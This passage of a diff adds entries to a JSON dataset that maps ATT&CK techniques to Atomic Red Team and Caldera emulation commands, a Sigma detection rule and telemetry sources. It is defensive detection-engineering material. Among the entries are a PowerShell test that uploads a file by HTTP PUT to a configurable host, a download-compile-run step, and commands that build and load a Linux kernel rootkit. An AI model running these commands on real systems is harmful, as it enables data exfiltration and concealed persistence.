"2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.yaml" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\reg.exe", + "CommandLine|contains": [ + "currentVersion\\windows", + "currentVersion\\runServicesOnce", + "currentVersion\\runServices", + "winlogon\\", + "currentVersion\\shellServiceObjectDelayLoad", + "currentVersion\\runOnce", + "currentVersion\\runOnceEx", + "currentVersion\\run", + "currentVersion\\policies\\explorer\\run", + "currentcontrolset\\services" + ] + }, + "condition": "selection" + }, + "fields": [ + "Image", + "CommandLine", + "User", + "LogonGuid", + "Hashes", + "ParentProcessGuid", + "ParentCommandLine" + ], + "level": "low", + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.t1007" + ] + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5861", + "WMI" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5861", + "WMI" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + 
"data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + 
"http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1010", + "command_list": [ + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -out:#{output_file_name} PathToAtomicsFolder\\T1010\\src\\T1010.cs\n#{output_file_name}\n", + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -out:%TEMP%\\T1010.exe #{input_source_code}\n%TEMP%\\T1010.exe\n", + "$x = Get-Process | Where-Object {$_.MainWindowTitle -ne \"\"} | Select-Object MainWindowTitle;\n$a = New-Object -com \"Shell.Application\"; $b = $a.windows() | select-object LocationName;\nwrite-host ($x | Format-List | Out-String) ($b | Format-List | Out-String)" + ], + "commands": [ + { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -out:#{output_file_name} PathToAtomicsFolder\\T1010\\src\\T1010.cs\n#{output_file_name}\n", + "source": "atomics/T1010/T1010.yaml", + "name": "Atomic Red Team Test - Application Window Discovery" + }, + { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -out:%TEMP%\\T1010.exe #{input_source_code}\n%TEMP%\\T1010.exe\n", + "source": "atomics/T1010/T1010.yaml", + "name": "Atomic Red Team Test - Application Window Discovery" + }, + { + "command": "$x = Get-Process | Where-Object {$_.MainWindowTitle -ne \"\"} | Select-Object MainWindowTitle;\n$a = New-Object -com \"Shell.Application\"; $b = $a.windows() | select-object LocationName;\nwrite-host ($x | Format-List | Out-String) ($b | Format-List | Out-String)", + "source": 
"data/abilities/discovery/5c65eec8-4839-4713-a4e1-86b2e75d1927.yml", + "name": "Extracts the names of all open non-explorer windows, and the locations of all explorer windows." + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1010", + "display_name": "Application Window Discovery", + "atomic_tests": [ + { + "name": "List Process Main Windows - C# .NET", + "auto_generated_guid": "fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4", + "description": "Compiles and executes C# code to list main window titles associated with each process.\n\nUpon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_source_code": { + "description": "Path to source of C# code", + "type": "Path", + "default": "PathToAtomicsFolder\\T1010\\src\\T1010.cs" + }, + "output_file_name": { + "description": "Name of output binary", + "type": "String", + "default": "%TEMP%\\T1010.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "T1010.cs must exist on disk at specified location (#{input_source_code})\n", + "prereq_command": "if (Test-Path #{input_source_code}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile \"#{input_source_code}\"\n" + } + ], + "executor": { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -out:#{output_file_name} #{input_source_code}\n#{output_file_name}\n", + "cleanup_command": "del /f /q /s #{output_file_name} >nul 2>&1\n", + "name": "command_prompt" + } + } + ] + }, + { + "id": "5c65eec8-4839-4713-a4e1-86b2e75d1927", + "name": "Application Window Discovery", + "description": 
"Extracts the names of all open non-explorer windows, and the locations of all explorer windows.", + "tactic": "discovery", + "technique": { + "attack_id": "T1010", + "name": "Application Window Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "$x = Get-Process | Where-Object {$_.MainWindowTitle -ne \"\"} | Select-Object MainWindowTitle;\n$a = New-Object -com \"Shell.Application\"; $b = $a.windows() | select-object LocationName;\nwrite-host ($x | Format-List | Out-String) ($b | Format-List | Out-String)" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "API monitoring" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + 
"description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" 
+ ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1014", + "command_list": [ + "sudo insmod #{rootkit_path}/#{rootkit_name}.ko\n", + "sudo insmod PathToAtomicsFolder/T1014/bin/#{rootkit_name}.ko\n", + "sudo insmod #{rootkit_path}/T1014.ko\n", + "sudo modprobe #{rootkit_name}\n", + "sudo modprobe T1014\n" + ], + "commands": [ + { + "command": "sudo insmod #{rootkit_path}/#{rootkit_name}.ko\n", + "source": "atomics/T1014/T1014.yaml", + "name": "Atomic Red Team Test - Rootkit" + }, + { + "command": "sudo insmod PathToAtomicsFolder/T1014/bin/#{rootkit_name}.ko\n", + "source": "atomics/T1014/T1014.yaml", + "name": "Atomic Red Team Test - Rootkit" + }, + { + "command": "sudo insmod #{rootkit_path}/T1014.ko\n", + "source": "atomics/T1014/T1014.yaml", + "name": "Atomic Red Team Test - Rootkit" + }, + { + "command": "sudo modprobe #{rootkit_name}\n", + "source": "atomics/T1014/T1014.yaml", + "name": "Atomic Red Team Test - Rootkit" + }, + { + "command": "sudo modprobe T1014\n", + "source": "atomics/T1014/T1014.yaml", + "name": "Atomic Red Team Test - Rootkit" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1014", + "display_name": "Rootkit", + "atomic_tests": [ + { + 
"name": "Loadable Kernel Module based Rootkit", + "auto_generated_guid": "dfb50072-e45a-4c75-a17e-a484809c8553", + "description": "Loadable Kernel Module based Rootkit\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "rootkit_source_path": { + "description": "Path to the rootkit source. Used when prerequistes are fetched.", + "type": "Path", + "default": "PathToAtomicsFolder/T1014/src/Linux" + }, + "rootkit_path": { + "description": "Path To rootkit", + "type": "String", + "default": "PathToAtomicsFolder/T1014/bin" + }, + "rootkit_name": { + "description": "Module name", + "type": "String", + "default": "T1014" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)\n", + "prereq_command": "if [ -f #{rootkit_path}/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "sudo apt install make\nsudo apt install gcc\nif [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; fi;\ncp #{rootkit_source_path}/* /tmp/T1014/\ncd /tmp/T1014; make\nmkdir #{rootkit_path}\nmv /tmp/T1014/#{rootkit_name}.ko #{rootkit_path}/#{rootkit_name}.ko\nrm -rf /tmp/T1014\n" + } + ], + "executor": { + "command": "sudo insmod #{rootkit_path}/#{rootkit_name}.ko\n", + "cleanup_command": "sudo rmmod #{rootkit_name}\nsudo rm -rf #{rootkit_path}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Loadable Kernel Module based Rootkit", + "auto_generated_guid": "75483ef8-f10f-444a-bf02-62eb0e48db6f", + "description": "Loadable Kernel Module based Rootkit\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "rootkit_source_path": { + "description": "Path to the rootkit source. 
Used when prerequistes are fetched.", + "type": "Path", + "default": "PathToAtomicsFolder/T1014/src/Linux" + }, + "rootkit_path": { + "description": "Path To rootkit", + "type": "String", + "default": "PathToAtomicsFolder/T1014/bin" + }, + "rootkit_name": { + "description": "Module name", + "type": "String", + "default": "T1014" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)\n", + "prereq_command": "if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "sudo apt install make\nsudo apt install gcc\nif [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; touch /tmp/T1014/safe_to_delete; fi;\ncp #{rootkit_source_path}/* /tmp/T1014\ncd /tmp/T1014; make \nsudo cp /tmp/T1014/#{rootkit_name}.ko /lib/modules/$(uname -r)/\n[ -f /tmp/T1014/safe_to_delete ] && rm -rf /tmp/T1014\nsudo depmod -a\n" + } + ], + "executor": { + "command": "sudo modprobe #{rootkit_name}\n", + "cleanup_command": "sudo modprobe -r #{rootkit_name}\nsudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko\nsudo depmod -a\n", + "name": "sh", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "LOG-MD", + "AutoRuns" + ], + [ + "LOG-MD", + "Windows Registry", + "Compare" + ], + [ + "LOG-MD", + "File Hash", + "Compare" + ], + [ + "BIOS" + ], + [ + "MBR" + ], + [ + "System calls" + ], + [ + "4688", + "Process Execution" + ], + [ + "LOG-MD", + "AutoRuns" + ], + [ + "LOG-MD", + "Windows Registry", + "Compare" + ], + [ + "LOG-MD", + "File Hash", + "Compare" + ], + [ + "BIOS" + ], + [ + "MBR" + ], + [ + "System calls" + ], + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": 
"drive modification", + "description": "A drive partition was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "drive" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + } + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", + "https://securelist.com/winnti-more-than-just-a-game/37029/", + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ], + null + ] + }, + { + "technique_id": "T1020", + "command_list": [ + "$fileName = \"C:\\temp\\T1020_exfilFile.txt\"\n$url = \"#{domain}\"\n$file = New-Item -Force $fileName -Value \"This is ART IcedID Botnet Exfil Test\"\n$contentType = \"application/octet-stream\"\ntry {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}", + "$fileName = \"#{file}\"\n$url = \"https://google.com\"\n$file = New-Item -Force $fileName -Value \"This is ART IcedID Botnet Exfil Test\"\n$contentType = \"application/octet-stream\"\ntry {Invoke-WebRequest -Uri $url 
-Method Put -ContentType $contentType -InFile $fileName} catch{}", + "powershell/exfiltration/egresscheck" + ], + "commands": [ + { + "command": "$fileName = \"C:\\temp\\T1020_exfilFile.txt\"\n$url = \"#{domain}\"\n$file = New-Item -Force $fileName -Value \"This is ART IcedID Botnet Exfil Test\"\n$contentType = \"application/octet-stream\"\ntry {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}", + "source": "atomics/T1020/T1020.yaml", + "name": "Atomic Red Team Test - Automated Exfiltration" + }, + { + "command": "$fileName = \"#{file}\"\n$url = \"https://google.com\"\n$file = New-Item -Force $fileName -Value \"This is ART IcedID Botnet Exfil Test\"\n$contentType = \"application/octet-stream\"\ntry {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}", + "source": "atomics/T1020/T1020.yaml", + "name": "Atomic Red Team Test - Automated Exfiltration" + }, + { + "command": "powershell/exfiltration/egresscheck", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1020", + "display_name": "Automated Exfiltration", + "atomic_tests": [ + { + "name": "IcedID Botnet HTTP PUT", + "auto_generated_guid": "9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0", + "description": "Creates a text file\nTries to upload to a server via HTTP PUT method with ContentType Header\nDeletes a created file", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file": { + "description": "Exfiltration File", + "type": "String", + "default": "C:\\temp\\T1020_exfilFile.txt" + }, + "domain": { + "description": "Destination Domain", + "type": "Url", + "default": "https://google.com" + } + }, + "executor": { + "command": "$fileName = \"#{file}\"\n$url = \"#{domain}\"\n$file = New-Item -Force $fileName -Value \"This is ART IcedID Botnet Exfil Test\"\n$contentType = 
\"application/octet-stream\"\ntry {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}", + "cleanup_command": "$fileName = \"#{file}\"\nRemove-Item -Path $fileName -ErrorAction Ignore", + "name": "powershell" + } + } + ] + }, + { + "Empire Module": "powershell/exfiltration/egresscheck", + "ATT&CK Technique #1": "T1020", + "ATT&CK Technique #2": "", + "Technique": "Automated Exfiltration", + "Concatenate for Python Dictionary": "\"powershell/exfiltration/egresscheck\": [\"T1020\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ], + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + 
"target_data_element": "command" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
